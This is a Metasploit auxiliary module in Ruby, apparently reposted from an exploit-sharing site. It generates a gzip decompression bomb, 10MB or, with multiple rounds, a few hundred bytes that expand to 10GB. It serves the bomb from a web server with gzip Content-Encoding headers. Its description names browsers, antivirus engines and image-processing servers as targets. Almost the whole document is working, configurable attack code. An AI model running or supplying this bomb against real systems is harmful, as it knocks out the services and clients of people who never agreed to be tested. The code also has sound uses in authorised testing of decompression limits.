Share
## https://sploitus.com/exploit?id=PACKETSTORM:180515
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'zlib'  
require 'stringio'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Gzip Memory Bomb Denial Of Service',  
'Description' => %q{  
This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.  
Many applications will not implement a length limit check and will eat up all memory and  
eventually die. This can also be used to kill systems that download/parse content from  
a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).  
  
A FILEPATH datastore option can also be provided to save the .gz bomb locally.  
  
Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly  
deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)  
will generate a 300 byte gzipped file that expands to 10GB.  
},  
'Author' =>  
[  
'info[at]aerasec.de', # 2004 gzip bomb advisory  
'joev' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'URL', 'http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html' ]  
],  
'DisclosureDate' => '2004-01-01',  
'Actions' =>  
[  
[ 'WebServer', 'Description' => 'Host file via web server' ]  
],  
'PassiveActions' =>  
[  
'WebServer'  
],  
'DefaultAction' => 'WebServer'))  
  
register_options(  
[  
OptInt.new('SIZE', [true, 'Size of uncompressed data in megabytes (10GB default).', 10240]),  
OptInt.new('ROUNDS', [true, 'Rounds of gzip compression. Some applications (FF) support > 1.', 1]),  
OptString.new('URIPATH', [false, 'Path of URI on server to the gzip bomb (default is random)']),  
OptString.new('CONTENT_TYPE', [false, 'Content-Type header to serve in the response', 'text/html'])  
],  
self.class)  
end  
  
def run  
datastore['HTTP::compression'] = false # not a good idea  
@gzip = generate_gzip  
print_status "Gzip generated. Uncompressed=#{default_size}bytes. Compressed=#{@gzip.length}bytes."  
exploit # start http server  
end  
  
def on_request_uri(cli, request)  
print_status "Sending gzipped payload to client #{cli.peerhost}"  
rounds = (['gzip']*datastore['ROUNDS']).join(', ')  
send_response(cli, @gzip, { 'Content-Encoding' => rounds, 'Content-Type' => datastore['CONTENT_TYPE'] })  
end  
  
# zlib ftw  
def generate_gzip(size=default_size, blocks=nil, reps=nil)  
reps ||= datastore['ROUNDS']  
return blocks if reps < 1  
  
print_status "Generating gzip bomb..."  
StringIO.open do |io|  
stream = Zlib::GzipWriter.new(io, Zlib::BEST_COMPRESSION, Zlib::DEFAULT_STRATEGY)  
buf = nil  
begin  
# add MB of data to the stream. this takes a little while, but doesn't kill memory.  
if blocks.nil?  
chunklen = 1024*1024*8 # 8mb per chunk  
a = "A"*chunklen  
n = size / chunklen  
  
n.times do |i|  
stream << a  
if i % 100 == 0  
print_status "#{i.to_s.rjust(Math.log(n,10).ceil)}/#{n} chunks added (#{'%.1f' % (i.to_f/n.to_f*100)}%)"  
end  
end  
else  
stream << blocks  
end  
  
a = nil # gc a  
buf = generate_gzip(size, io.string, reps-1)  
ensure  
stream.flush  
stream.close  
end  
buf  
end  
end  
  
def default_size  
datastore['SIZE']*1024*1024 # mb -> bytes  
end  
end